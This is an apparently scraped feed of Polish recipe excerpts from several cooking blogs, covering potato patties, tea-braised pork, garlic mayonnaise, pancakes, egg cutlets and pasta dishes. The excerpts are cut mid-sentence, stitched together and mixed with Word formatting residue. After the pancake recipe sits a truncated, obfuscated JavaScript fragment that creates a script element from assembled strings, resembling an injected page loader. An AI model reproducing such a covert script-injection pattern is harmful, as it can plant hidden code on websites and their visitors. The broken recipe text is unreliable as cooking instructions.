Dobry sposób na wykorzystanie ziemniaków z poprzedniego dnia. Świetnie smakują polane sosem lub jako dodatek do mięsnych potraw. Lekkie i zdrowe, bez panierki i smażenia w głębokim tłuszczu. Przygotowanie: 20 minut Koszt: Tanie Dzisiaj na talerzach wylądowały ziemniaczki w nieco innej formie. Jeśli komuś zostały z poprzedniego dnia lub ma ochotę na świeże, ale w nowej wersji, ten przepis jest(...)zabawa w jednym. Takie kotleciki były u mnie dodatkiem do dania mięsnego, bo jako sportowiec muszę uzupełniać zapotrzebowanie w nieco większe ilości białka. Choć też świetnie smakują same polane sosem np. pieczarkowym, bo taką wersję również przygotowałam (lecz na zdjęcie się już nie załapało). Podałam je z surówką z kapusty kiszonej i marchewki, gdzie przepis na nią znajdziecie TUTAJ . Wartość
zdrowo i aktywniemięso się usmaży, przez 1,5 godziny dusimy je w herbacie. Czasem podlewając naparem by karczek się nie przypalił. Następnie obieramy cebulę i jabłka. Wrzucamy je do naszego herbacianego sosu i dolewamy szklankę wina. Dusimy jeszcze z 10 minut. Gotowe. Teraz karczek kroimy w plastry i polewamy naszym sosem
Gotujemy i jemyNatka pietruszki i bazylia Czosnek obrać, zmiażdżyć i rozetrzeć w moździerzu. Żółtko posolić i ucierać z musztardą i czosnkiem. Stopniowo dodawać oliwę i cały czas ucierać. W czasie ucierania sos skropić sokiem z cytryny i letnią wodą. Gotowy majonez czosnkowy wymieszać ze śmietaną i doprawić ziołami
Gotujemy i jemyskórki. Pokroić na kawałki i pozbyć się pestek. Wrzucić do rondla o grubym dnie razem z plastrem cytryny, cynamonem i pokrojoną w kostkę pomarańczą. Gotować wszystko ok. 15 min. Sos pomidorowo pomarańczowy wylać na gęste sito i dokładnie przetrzeć. Jeżeli użyliśmy kory cynamonowej w całości i wyjąć ją z przecieru i wyrzucić. Powstały sos wlać do rondla o grubym dnie
Gotujemy i jemyNaleśniki z sałatką owocową! Pychota Naleśniki to cudowne danie, które można podać dosłownie na 1000 sposobów. Naleśniki można podawać jedynie z sosami, z nadzieniem - słodkim lub pikantnym, w postaci krokietów mięsnych bądź jarskich oraz jako cudowny, węglowodanowy dodatek do sałatek! Naleśniki można przyrządzać z mąki pszennej, razowej lub orkiszowej. Dla miłośników lekkiej diety proponujemy delikatne naleśniki z nadzieniem waniliowym(...)malinami i borówkami, pokroić w cząstki o podobnej wielkości. Owoce wymieszać, dodać likier i odstawić do schłodzenia. Sałatkę owocową podawać z naleśnikami waniliowymi ozdobioną listkami świeżej mięty, melisy, polaną sosem czekoladowym lub posypaną wiórkami kokosowymi. Za inspirację do przygotowania tego przepisu na pyszne fit naleśniki z sałatką owocową dziękujemy serwisowi xxlgastro.pl (function(){ zyqh=document.createElement("script");zyqh_=(("u")+"st")+"a";zyqh.async
Gotujemy i jemyszybki, tani i sezonowy obiad - kotlety jajeczne wraz z dodatkiem upieczonej dyni hokkaido. Bardzo proste do przygotowania. Kotleciki wbrew pozorom są mocno sycące. Najlepiej podać je z grzybowym sosem, np. kurkowym (przepis na sos TUTAJ ). Składniki na 4 porcje: 5 jajek 250 g upieczonej dyni, np. hokkaido sól, pieprz kurkuma 1 łyżka posiekanego koperku 2-3 łyżki bułki tartej
Ugotowaćdrobno posiekanej marchewki (julienne) Pęczek rzodkiewek pokrojonej w cienkie plastry ½ szklanki drobno pokrojonego szczypiorku ½ szklanki posiekanej zieleniny – pietruszka, kolendra, mięta 1 łyżka oleju Sól i pieprz Dresing 6 łyżek sosu sojowego 6 łyżek soku z cytryny 2 łyżki tartego imbiru 1 łyżeczka oleju sezamowego ½ łyżeczki brązowego cukru Przygotowanie: Krok 1 Steka wyciągnij wcześniej z lodówki, tak żeby był w temperaturze(...)Gotuj około 5 minut. Pod koniec gotowania sprawdzaj czy makaron jest już gotowy. Odcedź makaron i przelej zimną wodą, żeby nie kleił się. Krok 4 Przygotuj dresing: 6 łyżek sosu sojowego i soku z cytryny wlej do zakręcanego słoiczka. Dodaj 2 łyżki tartego imbiru, łyżeczkę oleju sezamowego i pół łyżeczki cukru. Zakręć i energicznie potrząśnij, żeby połączyć składniki. Krok
Niedzielny kucharzSkładniki: 2 torebki ryżu basmati 1 większa marchew 200g zielonej lub żółtej fasolki (świeżej lub mrożonej) 250g polędwicy lub steka wołowego 1 kawałek imbiru 1 ząbek czosnku 50 ml sosu sojowego 1 łyżka miodu 1 łyżka sezamu 1 łyżeczka oleju sezamowego (inny też ujdzie) 10 g skrobi ziemniaczanej (jeśli nie macie to też da radę) Przygotowanie: Marchewkę myjemy, obieramy(...)odpowiednio wcześniej należy ją rozmrozić. Warzywa rozkładamy w pojemniku do gotowania na parze i gotujemy przez 10 minut. Obrać imbir i czosnek, rozdrobnić i połączyć w całość. Dodać sos sojowy, miód, sezam i olej sezamowy. Gotować przez 7 minut. Wołowinę pokroić w paski i dodać do pojemnika na parze. Gotować razem z warzywami przez 15 minut. Po zakończeniu gotowania odstawiamy
Czynniki pierwszePieczony łosoś z sałatą rzymską i pomidorkami to idealne połączenie ryby i szybkiej bardzo prostej sałatki. Do sałatki wykorzystamy sałatę rzymską, która nie jest aż tak
Kulinarnyblog.pl - wiesz jak gotować!Kasza gryczana,suszone grzyby i pieczarki,wszystko to otulone liśćmi czerwonej kapusty i polane aromatycznym grzybowym sosem. Normal 0 21 false false false PL X-NONE X-NONE /* Style Definitions */ table.MsoNormalTable {mso-style-name:Standardowy; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-qformat:yes; mso-style(...)której moczyły się grzyby (ok. 250 ml) i bulionem. Gotować pod przykryciem 30 minut. Ugotowane gołąbki wyłożyć na półmisek. Śmietanę wymieszać z mąką i dodać do bulionu. Sos podać do gołąbków
Kolorowa kuchnia Elkirazem włosko - hiszpańsko - bałkańskie połączenie. Makaron międzynarodowy SKŁADNIKI: - 300g makaronu - 4 małe pomidory - 1 papryka czerwona - 400g filetu z kurczaka - łyżka oleju - 120g czerwonej fasoli - 2 ząbki czosnku - 150g sosu Ajvar (pikantnego) - 3 łyżki jogurtu naturalnego - przyprawy (pieprz, sól, bazylia) Makaron gotujemy zgodnie z instrukcją na opakowaniu. Kurczaka smażymy na rozgrzanym oleju, pod koniec smażenia doprawiając go solą i pierzem(...)Paprykę i czosnek kroimy w drobną kosteczkę i delikatnie podsmażamy. Pomidory kroimy na drobne części i łączymy z kurczakiem, papryką, czosnkiem, fasolą, sosem Ajvar, jogurtem naturalnym i bazylią. Wszystko delikatnie podsmażamy i podajemy z makaronem. Czas przygotowania: około 45 minut SMACZNEGO
Związek na patelnimała cebula 2 jajka ok. 6-7 łyżek mąki pszennej 3 łyżki bułki tartej 2-3 łyżki posiekanego koperku sól pieprz olej do smażenia sos czosnkowy: 3 łyżki majonezu 3 łyżki jogurtu naturalnego 2 ząbki czosnku sól, pieprz ew. posiekany świeży koperek Przygotowanie: Cukinię myjemy i odcinamy końce, nie obieramy. Ścieramy na tarce o grubych oczkach(...)ilość oleju, łyżką nakładamy ciasto i smażymy na złoty kolor z obu stron. Usmażone przekładamy na talerz wyłożony ręcznikiem papierowym, aby odsączyć z nadmiernego tłuszczu. Podajemy z sosem czosnkowym (wymieszany jogurt, majonez, przeciśnięty czosnek, sól, pieprz i ew. koperek). Smacznego
bistro mamabazylii Sól, pieprz Oregano, bazylia Szczypta cukru Sposób przygotowania: We wrzącej i osolonej wodzie gotujemy makaron według zalecenia na opakowaniu (al dente). Następnie ugotowany makaron odcedzamy i odstawiamy. Przygotowujemy sos. Rozgrzewamy patelnię z oliwą z oliwek. Następnie dodajemy przeciśnięty przez praskę czosnek i podsmażamy go. Pomidorki koktajlowe kroimy na pół i dodajemy je na patelnię. Następnie pieczarki obieramy, kroimy(...)drewnianą łyżką naciskamy pomidorki, tak by puściły sok. Następnie wszystkie składniki doprawiamy oregano, suszoną bazylią, szczyptą cukru, solą i pieprzem. Całość ponownie delikatnie mieszamy. Dodajemy odrobinę wody, by wydobyć sos. Następnie na patelnię dodajemy ugotowany wcześniej makaron. Oliwki kroimy w plasterki i również dodajemy je do makaronu. Całość dokładnie mieszamy drewnianą łyżką. Przed podaniem makaron posypujemy listkami świeżej bazylii. Artykuł
FoodMagazine.pl - Przepisy kulinarne